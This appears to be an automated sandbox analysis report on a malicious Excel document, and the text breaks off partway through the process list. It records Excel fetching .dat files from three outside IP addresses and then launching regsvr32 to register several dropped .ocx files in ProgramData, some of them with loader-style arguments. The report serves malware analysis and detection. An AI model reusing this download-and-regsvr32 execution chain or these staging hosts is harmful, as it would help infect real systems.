                                                                                                                                              Dec 2, 2021 17:29:17.824084044 CET8049747158.69.133.78192.168.2.3
                                                                                                                                              Dec 2, 2021 17:29:17.824167967 CET4974780192.168.2.3158.69.133.78
                                                                                                                                              Dec 2, 2021 17:30:22.163659096 CET804974845.142.211.62192.168.2.3
                                                                                                                                              Dec 2, 2021 17:30:22.163760900 CET4974880192.168.2.345.142.211.62
                                                                                                                                              Dec 2, 2021 17:30:22.305327892 CET8049746185.82.126.78192.168.2.3
                                                                                                                                              Dec 2, 2021 17:30:22.305520058 CET4974680192.168.2.3185.82.126.78
                                                                                                                                              Dec 2, 2021 17:30:22.826112986 CET8049747158.69.133.78192.168.2.3
                                                                                                                                              Dec 2, 2021 17:30:22.826267004 CET4974780192.168.2.3158.69.133.78
                                                                                                                                              Dec 2, 2021 17:30:59.310422897 CET4974880192.168.2.345.142.211.62
                                                                                                                                              Dec 2, 2021 17:30:59.310642004 CET4974780192.168.2.3158.69.133.78
                                                                                                                                              Dec 2, 2021 17:30:59.310827971 CET4974680192.168.2.3185.82.126.78
                                                                                                                                              Dec 2, 2021 17:30:59.347196102 CET804974845.142.211.62192.168.2.3
                                                                                                                                              Dec 2, 2021 17:30:59.375052929 CET8049746185.82.126.78192.168.2.3
                                                                                                                                              Dec 2, 2021 17:30:59.413793087 CET8049747158.69.133.78192.168.2.3

                                                                                                                                              HTTP Request Dependency Graph

                                                                                                                                              • 185.82.126.78
                                                                                                                                              • 158.69.133.78
                                                                                                                                              • 45.142.211.62

                                                                                                                                              HTTP Packets

                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                              0192.168.2.349746185.82.126.7880C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                                                              Dec 2, 2021 17:29:12.937355042 CET1280OUTGET /337591964609.dat HTTP/1.1
                                                                                                                                              Accept: */*
                                                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                                                                              Host: 185.82.126.78
                                                                                                                                              Connection: Keep-Alive
                                                                                                                                              Dec 2, 2021 17:29:13.063477039 CET1281INHTTP/1.1 403 Forbidden
                                                                                                                                              Server: nginx
                                                                                                                                              Date: Thu, 02 Dec 2021 16:29:13 GMT
                                                                                                                                              Content-Type: text/html
                                                                                                                                              Content-Length: 548
                                                                                                                                              Connection: keep-alive
                                                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a
                                                                                                                                              Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
                                                                                                                                              Dec 2, 2021 17:29:17.160629988 CET1285OUTGET /337591964609.dat2 HTTP/1.1
                                                                                                                                              Accept: */*
                                                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                                                                              Host: 185.82.126.78
                                                                                                                                              Connection: Keep-Alive
                                                                                                                                              Dec 2, 2021 17:29:17.301106930 CET1286INHTTP/1.1 403 Forbidden
                                                                                                                                              Server: nginx
                                                                                                                                              Date: Thu, 02 Dec 2021 16:29:17 GMT
                                                                                                                                              Content-Type: text/html
                                                                                                                                              Content-Length: 548
                                                                                                                                              Connection: keep-alive
                                                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a
                                                                                                                                              Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                              1192.168.2.349747158.69.133.7880C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                                                              Dec 2, 2021 17:29:13.177581072 CET1281OUTGET /337591964609.dat HTTP/1.1
                                                                                                                                              Accept: */*
                                                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                                                                              Host: 158.69.133.78
                                                                                                                                              Connection: Keep-Alive
                                                                                                                                              Dec 2, 2021 17:29:13.677134037 CET1282INHTTP/1.1 403 Forbidden
                                                                                                                                              Server: nginx
                                                                                                                                              Date: Thu, 02 Dec 2021 16:29:13 GMT
                                                                                                                                              Content-Type: text/html
                                                                                                                                              Content-Length: 548
                                                                                                                                              Connection: keep-alive
                                                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a
                                                                                                                                              Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
                                                                                                                                              Dec 2, 2021 17:29:17.304251909 CET1287OUTGET /337591964609.dat2 HTTP/1.1
                                                                                                                                              Accept: */*
                                                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                                                                              Host: 158.69.133.78
                                                                                                                                              Connection: Keep-Alive
                                                                                                                                              Dec 2, 2021 17:29:17.824084044 CET1287INHTTP/1.1 403 Forbidden
                                                                                                                                              Server: nginx
                                                                                                                                              Date: Thu, 02 Dec 2021 16:29:17 GMT
                                                                                                                                              Content-Type: text/html
                                                                                                                                              Content-Length: 548
                                                                                                                                              Connection: keep-alive
                                                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a
                                                                                                                                              Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                              2192.168.2.34974845.142.211.6280C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                                                              Dec 2, 2021 17:29:16.727348089 CET1283OUTGET /337591964609.dat HTTP/1.1
                                                                                                                                              Accept: */*
                                                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                                                                              Host: 45.142.211.62
                                                                                                                                              Connection: Keep-Alive
                                                                                                                                              Dec 2, 2021 17:29:16.965200901 CET1284INHTTP/1.1 403 Forbidden
                                                                                                                                              Server: nginx
                                                                                                                                              Date: Thu, 02 Dec 2021 16:29:17 GMT
                                                                                                                                              Content-Type: text/html
                                                                                                                                              Content-Length: 548
                                                                                                                                              Connection: keep-alive
                                                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a
                                                                                                                                              Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
                                                                                                                                              Dec 2, 2021 17:29:16.976291895 CET1284OUTGET /337591964609.dat2 HTTP/1.1
                                                                                                                                              Accept: */*
                                                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                                                                              Host: 45.142.211.62
                                                                                                                                              Connection: Keep-Alive
                                                                                                                                              Dec 2, 2021 17:29:17.156666040 CET1285INHTTP/1.1 403 Forbidden
                                                                                                                                              Server: nginx
                                                                                                                                              Date: Thu, 02 Dec 2021 16:29:17 GMT
                                                                                                                                              Content-Type: text/html
                                                                                                                                              Content-Length: 548
                                                                                                                                              Connection: keep-alive
                                                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a
                                                                                                                                              Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                                                              Code Manipulations

                                                                                                                                              Statistics

                                                                                                                                              Behavior

                                                                                                                                              Click to jump to process

                                                                                                                                              System Behavior

                                                                                                                                              Analysis Process: EXCEL.EXE PID: 5116 Parent PID: 744

                                                                                                                                              General

                                                                                                                                              Start time:17:29:06
                                                                                                                                              Start date:02/12/2021
                                                                                                                                              Path:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                              Commandline:"C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE" /automation -Embedding
                                                                                                                                              Imagebase:0x380000
                                                                                                                                              File size:27110184 bytes
                                                                                                                                              MD5 hash:5D6638F2C8F8571C593999C58866007E
                                                                                                                                              Has elevated privileges:true
                                                                                                                                              Has administrator privileges:true
                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                              Reputation:high

                                                                                                                                              Analysis Process: regsvr32.exe PID: 5784 Parent PID: 5116

                                                                                                                                              General

                                                                                                                                              Start time:17:29:16
                                                                                                                                              Start date:02/12/2021
                                                                                                                                              Path:C:\Windows\SysWOW64\regsvr32.exe
                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                              Commandline:regsvr32 C:\ProgramData\Volet1.ocx
                                                                                                                                              Imagebase:0x1f0000
                                                                                                                                              File size:20992 bytes
                                                                                                                                              MD5 hash:426E7499F6A7346F0410DEAD0805586B
                                                                                                                                              Has elevated privileges:true
                                                                                                                                              Has administrator privileges:true
                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                              Reputation:high

                                                                                                                                              Analysis Process: regsvr32.exe PID: 4000 Parent PID: 5116

                                                                                                                                              General

                                                                                                                                              Start time:17:29:18
                                                                                                                                              Start date:02/12/2021
                                                                                                                                              Path:C:\Windows\SysWOW64\regsvr32.exe
                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                              Commandline:regsvr32 C:\ProgramData\Volet2.ocx
                                                                                                                                              Imagebase:0x1f0000
                                                                                                                                              File size:20992 bytes
                                                                                                                                              MD5 hash:426E7499F6A7346F0410DEAD0805586B
                                                                                                                                              Has elevated privileges:true
                                                                                                                                              Has administrator privileges:true
                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                              Reputation:high

                                                                                                                                              Analysis Process: regsvr32.exe PID: 5216 Parent PID: 5116

                                                                                                                                              General

                                                                                                                                              Start time:17:29:18
                                                                                                                                              Start date:02/12/2021
                                                                                                                                              Path:C:\Windows\SysWOW64\regsvr32.exe
                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                              Commandline:regsvr32 C:\ProgramData\Volet3.ocx
                                                                                                                                              Imagebase:0x1f0000
                                                                                                                                              File size:20992 bytes
                                                                                                                                              MD5 hash:426E7499F6A7346F0410DEAD0805586B
                                                                                                                                              Has elevated privileges:true
                                                                                                                                              Has administrator privileges:true
                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                              Reputation:high

                                                                                                                                              Analysis Process: regsvr32.exe PID: 3412 Parent PID: 5116

                                                                                                                                              General

                                                                                                                                              Start time:17:29:19
                                                                                                                                              Start date:02/12/2021
                                                                                                                                              Path:C:\Windows\SysWOW64\regsvr32.exe
                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                              Commandline:regsvr32 -e -n -i:&Tiposa!G22& C:\ProgramData\Volet4.ocx
                                                                                                                                              Imagebase:0x1f0000
                                                                                                                                              File size:20992 bytes
                                                                                                                                              MD5 hash:426E7499F6A7346F0410DEAD0805586B
                                                                                                                                              Has elevated privileges:true
                                                                                                                                              Has administrator privileges:true
                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                              Reputation:high

                                                                                                                                              Analysis Process: regsvr32.exe PID: 3108 Parent PID: 5116

                                                                                                                                              General

                                                                                                                                              Start time:17:29:20
                                                                                                                                              Start date:02/12/2021
                                                                                                                                              Path:C:\Windows\SysWOW64\regsvr32.exe
                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                              Commandline:regsvr32 -e -n -i:&Tiposa!G22& C:\ProgramData\Volet5.ocx
                                                                                                                                              Imagebase:0x1f0000
                                                                                                                                              File size:20992 bytes
                                                                                                                                              MD5 hash:426E7499F6A7346F0410DEAD0805586B
                                                                                                                                              Has elevated privileges:true
                                                                                                                                              Has administrator privileges:true
                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                              Reputation:high

                                                                                                                                              Analysis Process: regsvr32.exe PID: 5344 Parent PID: 5116

                                                                                                                                              General

                                                                                                                                              Start time:17:29:20
                                                                                                                                              Start date:02/12/2021
                                                                                                                                              Path:C:\Windows\SysWOW64\regsvr32.exe
